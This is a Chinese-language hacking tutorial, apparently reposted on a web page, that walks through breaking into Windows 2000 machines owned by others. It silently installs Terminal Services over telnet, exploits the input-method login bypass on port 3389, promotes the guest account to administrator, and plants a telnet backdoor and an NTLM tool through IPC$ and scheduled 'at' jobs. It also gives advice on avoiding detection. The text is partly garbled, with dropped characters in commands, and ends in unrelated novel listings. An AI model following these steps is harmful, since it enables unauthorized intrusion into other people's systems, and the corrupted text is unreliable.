tel登陆对方主机;准备安装服务组件。 在这里;我强烈建议使用2000自带的tel服务端登陆;
有回显;不容易出错。个人感觉使用它;一次成功的比例高很多。(呵呵~;个人理解啊!)
就算没有开;打开用完后再关掉就完了。
。abu。写的最快速登录WIN2K TEL 服务已经把这个方法介绍的非常详细;
而且他的办法(在本机建立同名;同密码帐户);让快速实现tel登陆成为现实。 假如我们已开启对方23端口;
tel 192。168。0。1
输入用户名/密码
*===============================================================
欢迎使用 Microsoft Tel 服务器。
*===============================================================
C:》
成功进入!!!! 进入后;再次检查终端组件是否安装:
c:》query user
这个工具需要安装终端服务。 这样就进一步确定了组件没有被安装。如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
》w1 console 0 运行中 。 2002…1…12 22:5
类似这样的信息;可能组件就已安装。 好!都清楚了;可以开始安装了。
………………………………………………………………………………………………………………………………………
C:》dir c:sysoc。inf /s //检查INF文件的位置
c:WINNTinf 的目录 2000…01…10 20:00 3;770 sysoc。inf
1 个文件 3;770 字节
……………………………………………………………………………………………………………………………………………
C:》 dir c:sysocmgr。* /s //检查组件安装程序
c:WINNTsystem32 的目录 2000…01…10 20:00 42;768 sysocmgr。exe
1 个文件 42;768 字节
……………………………………………………………………………………………………………………………………………
c:》echo 'ponents' 》 c:wawa
c:》echo TSEnable = on 》》 c:wawa
//这是建立无人参与的安装参数
c:》type c:wawa
'ponents'
TSEnable = on
//检查参数文件
………………………………………………………………………………………………………………………………………………
c:》sysocmgr /i:c:winntinfsysoc。inf /u:c:wawa /q
……………………………………………………………………………………………………………………………………………
这一条就是真正安装组件的命令。
以上这条命令没有加/R参数;主机在安装完后自动重起。
如若加了/R参数主机就不会重起。 如果一切正常的话;几分钟后对方主机将会离线;当它重新回来时;
3389终端服务就已经开启。你就可以连上去了。 问题和建议: A 在安装过程中;不使用/R;有时主机也不会重起;你就要手动重起他;但在使用诸如:iisreset /reboot命令时;对方
的屏幕会出现个对话框;写着谁引起的这次启动;离重起还有多少秒。 B 一次不行可以再试一次;在实际中很有作用。 C 在输入sysocmgr命令开始安装时;一定不要把命令参数输错;那会在对方出现一个大的对话框;是sysocmgr的帮助;很是显眼;
而且要求确定。在你的屏幕上是不会有任何反应的;你不会知道出错,所以会有B的建议。
好了以后你就想干什么就干什么了。不过有时候还真不知道干什么,总之得干个事,装个什么局域网控制软件,不过不要体积太大,容易被发现。
超强 C 语言代码;你有信心看懂吗?
刚刚说有输入法漏洞的机子很少了,但有些朋友担心还有怎么办,不是吃大亏了吗?这样我找了一篇写的不错的文章贴一下( 注意是转载)写的不错,据说是新写的,这位大哥也真闲啊
WIN2000中文简体版存在的输入法漏洞,可以使本地用户绕过身分验证机制进入系统内部。经实验,WIN2000中文简体版的终端服务,在远程操作时仍然存在这一漏洞,而且危害更大。
WIN2000的终端服务功能,能使系统管理员对WIN2000进行远程操作,采用的是图形界面,能使用户在远程控制计算机时功能与在本地使用一样,其默认端口为3389,用户只要装了WIN2000的客户端连接管理器就能与开启了该服务的计算机相联。因此这一漏洞使终端服务成为WIN2000的合法木马。
工具:客户端连接管理器,下载地址:自己找吧,天天有好几种呢。
入侵步骤:
一,获得管理员账号。
我们先对一个网段进行扫描,扫描端口设为3389,运行客户端连接管理器,将扫描到的任一地址加入到,设置好客户端连接管理器,然后与服务器连结。几秒钟后,屏幕上显示出WIN2000登录界面(如果发现是英文或繁体中文版,放弃,另换一个地址),用CTRL+SHIFT快速切换输入法,切换至全拼,这时在登录界面左下角将出现输入法状态条(如果没有出现,请耐心等待,因为对方的数据流传输还有一个过程)。用右键点击状态条上的微软徽标,弹出“帮助”(如果发现“帮助”呈灰色,放弃,因为对方很可能发现并已经补上了这个漏洞),打开“帮助”一栏中“操作指南”,在最上面的任务栏点击右键,会弹出一个菜单,打开“跳至URL”。此时将出现WIN2000的系统安装路径和要求我们填入的路径的空白栏。比如,该系统安装在C盘上,就在空白栏中填入〃c:winntsystem32〃。然后按“确定”,于是我们就成功地绕过了身份验证,进入了系统的SYSTEM32目录。
现在我们要获得一个账号,成为系统的合法用户。在该目录下找到〃。exe〃,为〃。exe〃创建一个快捷方式,右键点击该快捷方式,在“属性”-》“目标”-》c:winntsystem32。exe后面空一格,填入〃user guest /active :yes〃点“确定”。这一步骤目的在于用。exe激活被禁止使用的guest账户,当然也可以利用〃user 用户名 密码/add〃,创建一个新账号,但容易引起网管怀疑。运行该快捷方式,此时你不会看到运行状态,但guest用户已被激活。然后又修改该快捷方式,填入〃user guest 密码〃,运行,于是guest便有了密码。最后,再次修改,填入“localgroup administrators guest /add,将guest变成系统管理员。
注意事项:1、在这过程中,如果对方管理员正在使用终端服务管理器,他将看到你所打开的进程id,你的ip和机器名,甚至能够给你发送消息。
2、终端服务器在验证你的身份的时候只留给了你一分钟的时间,在这一分钟内如果你不能完成上述操作,你只能再连结。
3、你所看到的图像与操作会有所延迟,这受网速的影响。
二,创建跳板。
再次登录终端用务器,以〃guest〃身份进入,此时guest已是系统管理员,已具备一切可执行权。打开“控制面板”,进入“网络和拔号连接”,在“本地连接”或“拔号连接”中查看属性,看对方是否选择“Microsoft 网络的文件和打印机共享”,如果没有,就打上勾。对方如果使用的是拔号上网,下次拔号网络共享才会打开。
退出对方系统,在本地机命令提示符下,输入
use IP AddressIPC '〃password〃' /user:〃guset〃,通过IPC的远程登陆就成功了。
登陆成功之后先复制一个Tel的程序上去(小榕流光安装目录下的Tools目录里的Srv。exe;另外,还有ntml。xex,一会要用),这个程序是在对方上面开一个Tel服务,端口是99。
copy c:hacksrv。exe ***。***。***。***admin
然后利用定时服务启动它,先了解对方的时间:
time ***。***。***。***
显示:
***。***。***。*** 的当前时间是 2001/1/8 下午 08:55
命令成功完成。
然后启动srv。exe:
at ***。***。***。*** 09:00 srv。exe
显示:
新加了一项作业,其作业 ID = 0
过几分钟后,tel ***。***。***。*** 99
这里不需要验证身份,直接登录,显示:
c:winnt:system32》
我们就成功登陆上去了。然后又在本地打开命令提示符,另开一个窗口,输入:
copy c:hackntlm。exe 211。21。193。202admin
把事先存放在hack目录里的ntlm。exe拷过去。然后又回到刚才的tel窗口,运行ntlm。exe
C:WINNTsystem32》ntlm
显示:
Windows 2000 Tel Dump; by Assassin; All Rights Reserved。
Done!
C:WINNTsystem32》
C:WINNTsystem32》
好,现在我们来启动WIN2000本身的tel,首先终止srv。exe的tel服务:
stop tel 系统告诉你并没有启动tel,不理它,继续:
start tel 这次真的启动了tel,我们可以在另开的命令提示符窗口tel到对方的
23端口,验
小说推荐
- 专业打脸户
- ︱田︱田田╬版 权 归 原 作 者 手机访问 m╮欢迎光临︱田︱田田╬版 权 归 原 作 者╮欢迎光临︱田︱田田╬版 权 归 原 作 者【你的用户名】整理附】内容版权归作者所有=书名[快穿]专业打脸户作者:圆墩墩文案为了拯救男神,姜札穿越到不同的位面中抢夺气运渣男?虐之!白莲花?打之!心机girl?
- 科幻穿越
- 最新章:第68章
- 打造超级农业帝国
- 《打造超级农业帝国》作者:坐吃三空第一章 七彩流星!第一章 七彩流星 第一章七彩流星“混账小子,还反了你了!老子花钱供你上大学,就是不想让你再当农民。你倒好,放着挺好的大城市不待,反倒是想回来种地!老子告诉你,只要老子还活着一天,你就甭做这种梦 林富贵气的不轻,以至于捧着旱烟杆的双手,都有些不由自控
- 都市言情
- 最新章:第275章
- [快穿]专业打脸户
- 书名[快穿]专业打脸户作者:圆墩墩文案为了拯救男神,姜札穿越到不同的位面中抢夺气运渣男?虐之!白莲花?打之!心机girl?无视之!陆离“你玩的挺嗨的样子”姜札(讨好状“离离其实我只想玩你啊。本文须知:1:本文1v1,快穿打脸文,旨在虐渣男以及崩坏世界,请放心食用。2:苏苏苏爽爽爽请自带避雷针。内容标
- 科幻穿越
- 最新章:第68章
- 论一只网红猫的专业素养
- 《论一只网红猫的专业素养》作者:糖醋非鱼文案公主是一只猫。一只网红猫。但是她对自己的名字超级不满意。谁家的正经猫会叫这么挫的名字啊掀桌┻司祁:哎呀我的小公举,你今天还是一如既往的美啊~公主:MDZZ—算了算了,你负责赚钱养家你最大,你说什么是什么,你开心就好。本文又叫《男神是个铲屎官《喵!快来给本宫
- 都市言情
- 最新章:第57章
- 今天开始打职业
- -今天开始打职业[电竞]作者:陆一砂 文案 顾纸重生后,不仅变成了一个网瘾少女,还成了问题儿童 顺利成为职业选手之后,她总觉得自家上单看她的眼神有些不对,让她很方 日常小片段 陆湛:你在干嘛?顾纸:填老婆报名表 陆湛抽过纸一看,眉头一皱:他哪点吸引你了 顾纸拖着下巴思考:一打四反杀一人的时候 过了一
- 都市言情
- 最新章:第141章
- 金牌甜心:打造天团巨星
- 简介:聂闪闪,由于父母在外逍遥快活,不愿意继承家业。所以小小年纪就成了最大的造星工厂‘伯乐影业’的唯一女继承人。爷爷为了培养她的能力,不惜让她‘女扮男装’以吕帅帅的名义混在超人气‘东方神韵‘最强智者’的偶像天团里。悲催的是,当十个大男孩的助理。一比十,这很不公平好不好?157808第1章 女扮男装)
- 其他
- 最新章:第244章
- [电竞]今天开始打职业
- 《今天开始打职业[电竞》作者:陆一砂 文案 顾纸重生后 不仅变成了一个网瘾少女 还成了问题儿童 顺利成为职业选手之后 她总觉得自家上单看她的眼神有些不对,让她很方 日常小片段 陆湛:你在干嘛 顾纸:填老婆报名表 陆湛抽过纸一看,眉头一皱:他哪点吸引你了 顾纸拖着下巴思考:一打四反杀一人的时候 过了一
- 网游竞技
- 最新章:第141章
- 兢兢业业打酱油
- 《兢兢业业打酱油》作者:小黑爪文案当被选中去各个世界打酱油时,庄原同意了。虽然世界里主角最亮眼但没有辣么多的酱油呀路人呀NPC的,世界也是无法构成的好伐。他会做一个非常敬业的酱油,在每个岗位发光发热。只是,有没有人来告诉他为毛他的戏份好像越来越多?这一定是他的错觉吧。1V1,攻从头到尾都是同一个人必
- 激情
- 最新章:第147章
- 打造异界
- 简介:凭借神秘系统打造一个属于我的世界!我叫假正经,我为自己代言!额不对,我叫贾正金.105049第一章 你已经死了)网吧里乌烟瘴气,到处都是放在桌面上的臭脚和烟味。最角落的位置,贾正金死死盯着电脑屏幕,手指灵活地操作键盘和鼠标“贾正金”身后有人拍了拍他的肩膀“等会!没看到我的城堡就要造成了吗”贾正
- 武侠修真
- 最新章:第1812章